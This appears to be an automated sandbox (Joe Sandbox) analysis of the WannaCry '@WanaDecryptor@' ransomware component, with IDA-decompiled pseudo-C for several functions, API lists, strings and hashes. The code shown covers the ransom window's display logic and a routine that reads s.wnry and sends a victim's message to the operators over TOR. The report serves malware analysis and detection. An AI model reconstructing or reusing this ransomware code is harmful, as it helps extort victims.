                                  					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
                                  					_t246 =  *((intOrPtr*)(_t443 + 0x28));
                                  					if(_t246 != 0) {
                                  						if(_t246 != 0x5a) {
                                  							if(_t246 != 0xb4) {
                                  								if(_t246 != 0x10e) {
                                  									goto L21;
                                  								}
                                  								_t441 =  *(_t443 + 0x20);
                                  								 *(_t443 + 0x10) = _t441;
                                  								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                  								_t438 =  ~_t441;
                                  								L20:
                                  								 *(_t443 + 0x24) = 0;
                                  								goto L21;
                                  							}
                                  							_t311 =  *(_t443 + 0x20);
                                  							 *(_t443 + 0x2c) = _t311;
                                  							_t438 = 0;
                                  							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                  							 *(_t443 + 0x24) =  ~_t311;
                                  							goto L21;
                                  						}
                                  						_t438 =  *(_t443 + 0x20);
                                  						 *(_t443 + 0x10) = _t438;
                                  						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                  						goto L20;
                                  					} else {
                                  						_t314 =  *(_t443 + 0x20);
                                  						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                  						 *(_t443 + 0x2c) = _t314;
                                  						 *(_t443 + 0x24) = _t314;
                                  						L21:
                                  						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
                                  						if((_t321[1] & 0x00000010) == 0) {
                                  							asm("cdq");
                                  							 *(_t443 + 0x44) =  *_t433;
                                  							asm("cdq");
                                  							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
                                  							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
                                  								_t264 =  *((intOrPtr*)(_t443 + 0xec));
                                  								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
                                  									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
                                  								}
                                  								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
                                  								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
                                  									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                  									if( *(_t443 + 0x90) == 0xffffffff) {
                                  										 *(_t443 + 0x6c) = _t282;
                                  									}
                                  									_t283 = _t440;
                                  									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
                                  									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
                                  									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
                                  									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
                                  									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
                                  									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
                                  								}
                                  								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                  									L39:
                                  									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
                                  									 *(_t443 + 0xdc) = 9;
                                  									L00412CC2();
                                  									 *(_t443 + 0x78) = 0x416770;
                                  									_t269 =  *(_t443 + 0x74);
                                  									 *(_t443 + 0xdc) = 0xb;
                                  									if(_t269 != 0xffffffff) {
                                  										_push(_t269);
                                  										L00413004();
                                  									}
                                  									 *(_t443 + 0x84) = 0x416774;
                                  									_t270 =  *(_t443 + 0x70);
                                  									 *(_t443 + 0xdc) = 0xc;
                                  									if(_t270 != 0) {
                                  										_push(_t270);
                                  										L00412DC4();
                                  									}
                                  									 *(_t443 + 0x64) = 0x416778;
                                  									_t271 =  *(_t443 + 0x6c);
                                  									 *(_t443 + 0xdc) = 0xd;
                                  									if(_t271 != 0xffffffff) {
                                  										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
                                  									}
                                  									 *(_t443 + 0x50) = 0x41677c;
                                  									_t272 =  *(_t443 + 0x60);
                                  									 *(_t443 + 0xdc) = 0xf;
                                  									if(_t272 != 0) {
                                  										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
                                  									}
                                  									 *(_t443 + 0x60) = 0;
                                  									L00412D52();
                                  									_t226 = _t443 + 0x58;
                                  									 *(_t443 + 0x58) = 0x415c00;
                                  									 *(_t443 + 0x70) = _t226;
                                  									 *(_t443 + 0xdc) = 0x10;
                                  									L00412D52();
                                  									 *(_t443 + 0x58) = 0x415bec;
                                  									 *(_t443 + 0x50) = 0x416794;
                                  									goto L48;
                                  								} else {
                                  									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                  									if( *(_t443 + 0x6c) == 0xffffffff) {
                                  										 *(_t443 + 0x6c) = _t276;
                                  									}
                                  									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
                                  									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
                                  									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
                                  									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
                                  									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
                                  									_t279 =  *_t429;
                                  									_push(_t443 + 0x48);
                                  									_push(_t443 + 0x18);
                                  									_t361 = _t443 + 0x38;
                                  									L38:
                                  									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
                                  									goto L39;
                                  								}
                                  							}
                                  							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
                                  							goto L39;
                                  						}
                                  						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
                                  						_t295 =  *(_t443 + 0x2c);
                                  						if( *(_t443 + 0x40) == 0) {
                                  							_t295 =  *(_t443 + 0x10);
                                  						}
                                  						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                  							goto L39;
                                  						} else {
                                  							asm("cdq");
                                  							_t418 =  *((intOrPtr*)(_t443 + 0x34));
                                  							 *(_t443 + 0x40) =  *_t433;
                                  							asm("cdq");
                                  							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
                                  							_t279 =  *_t429;
                                  							_push(_t443 + 0x48);
                                  							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
                                  							_push(_t443 + 0x18);
                                  							goto L38;
                                  						}
                                  					}
                                  				}
                                  			}


































                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                  • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                  • API String ID: 2923375784-3599407550
                                  • Opcode ID: 4537b4b5c38f08034835ba6f49b0df8f11378c8c8d7c7bac32dddfd5d0061b5a
                                  • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                  • Opcode Fuzzy Hash: 4537b4b5c38f08034835ba6f49b0df8f11378c8c8d7c7bac32dddfd5d0061b5a
                                  • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00405230(void* __ecx) {
                                  				RECT* _v12;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				intOrPtr _v44;
                                  				char _v48;
                                  				char _v52;
                                  				void* _v56;
                                  				void* _v60;
                                  				void* _v64;
                                  				void* _v68;
                                  				int _t98;
                                  				int _t99;
                                  				int _t104;
                                  				char* _t106;
                                  				void* _t109;
                                  				char* _t110;
                                  				signed int _t113;
                                  				int _t114;
                                  				void* _t117;
                                  				char* _t118;
                                  				char _t119;
                                  				char* _t120;
                                  				signed int _t122;
                                  				void* _t123;
                                  				int _t126;
                                  				int _t127;
                                  				int _t130;
                                  				void* _t132;
                                  				signed int _t136;
                                  				signed int _t142;
                                  				intOrPtr _t163;
                                  				intOrPtr _t179;
                                  				signed int _t182;
                                  				signed int _t198;
                                  				void* _t199;
                                  				signed int _t200;
                                  				void* _t201;
                                  				intOrPtr* _t205;
                                  				void* _t208;
                                  				intOrPtr* _t212;
                                  				intOrPtr* _t213;
                                  				intOrPtr _t215;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413918);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t215;
                                  				_t208 = __ecx;
                                  				_t182 =  *(__ecx + 0x70);
                                  				if(_t182 != 1) {
                                  					if(__eflags <= 0) {
                                  						L33:
                                  						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
                                  						L34:
                                  						 *[fs:0x0] = _v12;
                                  						return _t98;
                                  					}
                                  					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
                                  					if( *((char*)(__ecx + 0x4b)) != 1) {
                                  						L15:
                                  						_t99 =  *(_t208 + 0x78);
                                  						__eflags = _t99 - 3;
                                  						if(_t99 != 3) {
                                  							__eflags = _t99 - 2;
                                  							if(_t99 != 2) {
                                  								__eflags = _t99;
                                  								if(_t99 != 0) {
                                  									__eflags = _t99 - 1;
                                  									if(_t99 != 1) {
                                  										goto L33;
                                  									}
                                  									_t212 = _t208 + 0x44;
                                  									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                  									_t136 =  *(_t208 + 0x74);
                                  									asm("cdq");
                                  									_t98 = _t198 / _t136;
                                  									__eflags = _t98;
                                  									if(_t98 == 0) {
                                  										goto L34;
                                  									}
                                  									__eflags = _t198 - _t136;
                                  									if(_t198 < _t136) {
                                  										goto L34;
                                  									}
                                  									_t199 = 0;
                                  									__eflags = _t98;
                                  									if(_t98 <= 0) {
                                  										goto L33;
                                  									}
                                  									_t126 = _t98;
                                  									do {
                                  										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
                                  										_push(_t199);
                                  										L00412E12();
                                  										_push(1);
                                  										_push( *(_t208 + 0x74) + _t199);
                                  										L00412E0C();
                                  										_t136 =  *(_t208 + 0x74);
                                  										_t199 = _t199 + _t136;
                                  										_t126 = _t126 - 1;
                                  										__eflags = _t126;
                                  									} while (_t126 != 0);
                                  									goto L33;
                                  								}
                                  								_t213 = _t208 + 0x44;
                                  								_t142 =  *(_t208 + 0x74);
                                  								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                  								asm("cdq");
                                  								_t104 = _t200 / _t142;
                                  								__eflags = _t104;
                                  								if(_t104 == 0) {
                                  									L22:
                                  									_t104 = 1;
                                  									L23:
                                  									_t201 = 0;
                                  									__eflags = _t104;
                                  									if(_t104 <= 0) {
                                  										goto L33;
                                  									}
                                  									_t127 = _t104;
                                  									do {
                                  										_push( *((intOrPtr*)(_t201 +  *_t213)));
                                  										_push(_t142 + _t201);
                                  										L00412E12();
                                  										_push(1);
                                  										_push(_t201);
                                  										L00412E0C();
                                  										_t142 =  *(_t208 + 0x74);
                                  										_t201 = _t201 + _t142;
                                  										_t127 = _t127 - 1;
                                  										__eflags = _t127;
                                  									} while (_t127 != 0);
                                  									goto L33;
                                  								}
                                  								__eflags = _t200 - _t142;
                                  								if(_t200 >= _t142) {
                                  									goto L23;
                                  								}
                                  								goto L22;
                                  							}
                                  							_t106 =  &_v32;
                                  							_push( *(_t208 + 0x74));
                                  							_push(_t106);
                                  							L00412E24();
                                  							_push( *(_t208 + 0x74));
                                  							_push( &_v24);
                                  							_v12 = 8;
                                  							L00412E30();
                                  							_push( &_v48);
                                  							_push(_t106);
                                  							_push( &_v36);
                                  							_v20 = 9;
                                  							L00412E18();
                                  							_push(_t106);
                                  							_v32 = 0xa;
                                  							L00412D9A();
                                  							_v36 = 9;
                                  							L00412CC2();
                                  							_v36 = 8;
                                  							L00412CC2();
                                  							_v36 = 0xffffffff;
                                  							L00412CC2();
                                  							goto L33;
                                  						}
                                  						_push( *(_t208 + 0x74));
                                  						_push( &_v36);
                                  						L00412E1E();
                                  						_v12 = 5;
                                  						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
                                  						_push(_t109);
                                  						_push( &_v36);
                                  						L00412E24();
                                  						_push(_t109);
                                  						_t110 =  &_v52;
                                  						_push(_t110);
                                  						_push( &_v40);
                                  						_v20 = 6;
                                  						L00412E18();
                                  						_push(_t110);
                                  						_v32 = 7;
                                  						L00412D9A();
                                  						_v36 = 6;
                                  						L00412CC2();
                                  						_v36 = 5;
                                  						L00412CC2();
                                  						_v36 = 0xffffffff;
                                  						L00412CC2();
                                  						goto L33;
                                  					}
                                  					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                  					_t113 =  *(__ecx + 0x74) * _t182;
                                  					__eflags = _t163 - _t113;
                                  					if(_t163 >= _t113) {
                                  						goto L15;
                                  					}
                                  					_t114 = _t113 - _t163;
                                  					__eflags = _t114;
                                  					if(_t114 <= 0) {
                                  						goto L15;
                                  					}
                                  					_t130 = _t114;
                                  					do {
                                  						_push( *((intOrPtr*)(__ecx + 0x40)));
                                  						L00412E36();
                                  						_t130 = _t130 - 1;
                                  						__eflags = _t130;
                                  					} while (_t130 != 0);
                                  					goto L15;
                                  				}
                                  				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
                                  					L6:
                                  					_t205 = _t208 + 0x44;
                                  					if( *(_t208 + 0x78) != 0) {
                                  						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
                                  						_push(_t117);
                                  						_push( &_v36);
                                  						L00412E24();
                                  						_t118 =  &_v36;
                                  						_push(1);
                                  						_push(_t118);
                                  						_v12 = 2;
                                  						L00412E1E();
                                  						_push(_t117);
                                  						_push(_t118);
                                  						_push( &_v40);
                                  						_v20 = 3;
                                  						L00412E18();
                                  						_push(_t118);
                                  						_v32 = 4;
                                  						L00412D9A();
                                  						_v36 = 3;
                                  						L00412CC2();
                                  						_v36 = 2;
                                  						L00412CC2();
                                  						_v36 = 0xffffffff;
                                  						L00412CC2();
                                  					} else {
                                  						_push(1);
                                  						_push( &_v24);
                                  						_t119 =  *((intOrPtr*)( *_t205));
                                  						_v36 = _t119;
                                  						L00412E30();
                                  						_v12 = 0;
                                  						_push(_v44);
                                  						_push(_t119);
                                  						_t120 =  &_v36;
                                  						_push(_t120);
                                  						L00412E2A();
                                  						_push(_t120);
                                  						_v24 = 1;
                                  						L00412D9A();
                                  						_v28 = 0;
                                  						L00412CC2();
                                  						_v28 = 0xffffffff;
                                  						L00412CC2();
                                  					}
                                  					goto L33;
                                  				}
                                  				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                  				_t122 =  *(__ecx + 0x74);
                                  				if(_t179 >= _t122) {
                                  					goto L6;
                                  				}
                                  				_t123 = _t122 - _t179;
                                  				if(_t123 <= 0) {
                                  					goto L6;
                                  				}
                                  				_t132 = _t123;
                                  				do {
                                  					_push( *((intOrPtr*)(__ecx + 0x40)));
                                  					L00412E36();
                                  					_t132 = _t132 - 1;
                                  				} while (_t132 != 0);
                                  				goto L6;
                                  			}


                                  APIs
                                  • #940.MFC42(?), ref: 0040527D
                                  • #4277.MFC42(?,00000001), ref: 004052A0
                                  • #923.MFC42(?,00000000,?), ref: 004052B8
                                  • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                  • #4129.MFC42(?,?), ref: 004052FC
                                  • #5710.MFC42 ref: 00405314
                                  • #922.MFC42(?,00000000,00000000), ref: 00405326
                                  • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                  • #940.MFC42(?), ref: 00405396
                                  • #5710.MFC42(?,?), ref: 004053B8
                                  • #4129.MFC42(?,?,?,?), ref: 004053D7
                                  • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                  • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                  • #4129.MFC42(?,?), ref: 00405443
                                  • #4277.MFC42(?,?,?,?), ref: 0040545B
                                  • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                  • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                  • #6778.MFC42(?,00000001), ref: 004054EA
                                  • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                  • #6778.MFC42(00000000,?), ref: 00405536
                                  • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                  • String ID:
                                  • API String ID: 2121400562-0
                                  • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                  • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E004082C0(void* __ecx) {
                                  				void* __ebp;
                                  				signed int _t44;
                                  				void* _t45;
                                  				void* _t47;
                                  				signed int _t48;
                                  				signed int _t51;
                                  				signed int _t56;
                                  				signed int _t58;
                                  				signed int _t59;
                                  				void* _t60;
                                  				signed int _t65;
                                  				signed int _t90;
                                  				signed int _t91;
                                  				signed int _t104;
                                  				intOrPtr* _t106;
                                  				struct _IO_FILE* _t107;
                                  				signed int _t108;
                                  				void* _t111;
                                  				intOrPtr _t114;
                                  				void* _t115;
                                  				void* _t116;
                                  				void* _t118;
                                  				void* _t120;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413FCE);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t114;
                                  				_t115 = _t114 - 0x8c;
                                  				_t111 = __ecx;
                                  				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
                                  				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
                                  				if(_t44 > 0x3e8) {
                                  					_push(0x3e8);
                                  					_push(0);
                                  					_push(_t115 + 0x14);
                                  					L00412F6E();
                                  					_push(_t44);
                                  					 *((char*)(_t115 + 0xa8)) = 1;
                                  					L00412D9A();
                                  					 *((char*)(_t115 + 0xa4)) = 0;
                                  					L00412CC2();
                                  				}
                                  				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
                                  					_t106 = __imp__time;
                                  					_t45 =  *_t106(0);
                                  					_t90 =  *0x4218a8; // 0x0
                                  					_t116 = _t115 + 4;
                                  					__eflags = _t45 - _t90 - 0xb4;
                                  					if(_t45 - _t90 >= 0xb4) {
                                  						L13:
                                  						_t47 =  *_t106(0);
                                  						_t91 =  *0x4218a8; // 0x0
                                  						_t116 = _t116 + 4;
                                  						_t48 = _t47 - _t91;
                                  						__eflags = _t48 - 0xe10;
                                  						if(_t48 <= 0xe10) {
                                  							L9:
                                  							__eflags =  *0x4218ac - 3; // 0x0
                                  							if(__eflags < 0) {
                                  								L15:
                                  								 *((intOrPtr*)(_t116 + 0x14)) = 0;
                                  								memset(_t116 + 0x18, 0, 0x21 << 2);
                                  								_t51 = fopen("00000000.res", "rb");
                                  								_t107 = _t51;
                                  								_t118 = _t116 + 0x14;
                                  								__eflags = _t107;
                                  								if(_t107 != 0) {
                                  									fread(_t118 + 0x1c, 0x88, 1, _t107);
                                  									fclose(_t107);
                                  									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
                                  									_push(0);
                                  									_push( *((intOrPtr*)(_t118 + 0xcc)));
                                  									_push(_t118 + 0x38);
                                  									_push(_t111 + 0x5f0);
                                  									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
                                  									_t118 = _t118 + 0x30;
                                  									_t108 = _t56;
                                  									E0040C670();
                                  									_t58 =  *(_t118 + 0xb0);
                                  									__eflags = _t108;
                                  									if(_t108 < 0) {
                                  										__eflags = _t58;
                                  										if(_t58 != 0) {
                                  											_push(0);
                                  											_push(0x30);
                                  											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                  											L00412CC8();
                                  										}
                                  									} else {
                                  										__eflags = _t58;
                                  										if(_t58 != 0) {
                                  											L00412CC8();
                                  											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
                                  											_t118 = _t118 + 4;
                                  											 *0x4218a8 = _t58;
                                  										}
                                  									}
                                  									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                  									L00412CC2();
                                  									_t59 = _t108;
                                  								} else {
                                  									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                  									L00412CC2();
                                  									_t59 = _t51 | 0xffffffff;
                                  								}
                                  								L23:
                                  								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
                                  								return _t59;
                                  							}
                                  							__eflags =  *(_t116 + 0xb0);
                                  							if( *(_t116 + 0xb0) != 0) {
                                  								L00412DA6();
                                  								 *((char*)(_t116 + 0xa8)) = 2;
                                  								_t60 =  *_t106(0);
                                  								_t104 =  *0x4218a8; // 0x0
                                  								_t120 = _t116 + 4;
                                  								__eflags = 0x3d;
                                  								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
                                  								_push("You are sending too many mails! Please try again %d minutes later.");
                                  								_push(_t120 + 0x10);
                                  								L00412E00();
                                  								_t48 =  *(_t120 + 0x1c);
                                  								_t116 = _t120 + 0xc;
                                  								_push(0);
                                  								_push(0);
                                  								_push(_t48);
                                  								L00412CC8();
                                  								 *((char*)(_t116 + 0xa4)) = 0;
                                  								L00412CC2();
                                  							}
                                  							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
                                  							L00412CC2();
                                  							_t59 = _t48 | 0xffffffff;
                                  							goto L23;
                                  						}
                                  						 *0x4218ac = 0;
                                  						goto L15;
                                  					}
                                  					_t65 =  *0x4218ac; // 0x0
                                  					__eflags = _t65 - 3;
                                  					if(_t65 >= 3) {
                                  						goto L13;
                                  					}
                                  					_t48 = _t65 + 1;
                                  					__eflags = _t48;
                                  					 *0x4218ac = _t48;
                                  					goto L9;
                                  				}
                                  				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
                                  					_push(0);
                                  					_push(0);
                                  					_push("Too short message!");
                                  					L00412CC8();
                                  				}
                                  				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
                                  				L00412CC2();
                                  				_t59 = _t44 | 0xffffffff;
                                  				goto L23;
                                  			}

                                  0x004083a1
                                  0x004083a3
                                  0x00000000
                                  0x00000000
                                  0x004083a9
                                  0x004083a9
                                  0x004083aa
                                  0x00000000
                                  0x004083aa
                                  0x0040834b
                                  0x0040834d
                                  0x0040834e
                                  0x0040834f
                                  0x00408354
                                  0x00408354
                                  0x00408360
                                  0x0040836b
                                  0x00408370
                                  0x00000000

                                  APIs
                                  • #4278.MFC42(000003E8,00000000,000003E8,?,?,75F15C80), ref: 0040830D
                                  • #858.MFC42 ref: 00408322
                                  • #800.MFC42 ref: 00408332
                                  • #1200.MFC42(Too short message!,00000000,00000000,?,?,75F15C80), ref: 00408354
                                  • #800.MFC42 ref: 0040836B
                                  • time.MSVCRT ref: 0040837F
                                  • #540.MFC42 ref: 004083C8
                                  • time.MSVCRT ref: 004083D6
                                  • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                  • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                  • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                  • #800.MFC42 ref: 00408440
                                  • time.MSVCRT ref: 0040844E
                                  • fopen.MSVCRT ref: 00408487
                                  • #800.MFC42 ref: 004084A8
                                  • fread.MSVCRT ref: 004084C2
                                  • fclose.MSVCRT ref: 004084C9
                                  • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                  • time.MSVCRT ref: 00408528
                                  • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                  • #800.MFC42 ref: 0040855B
                                  Strings
                                  • Your message has been sent successfully!, xrefs: 0040851D
                                  • 00000000.res, xrefs: 00408480
                                  • s.wnry, xrefs: 004084DD
                                  • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                  • Too short message!, xrefs: 0040834F
                                  • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                  • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                  • API String ID: 1233543560-382338106
                                  • Opcode ID: 3ee7c5ec19339d64f41b4fc520303524cb4926ddffb0bc781f41dba239aacf8a
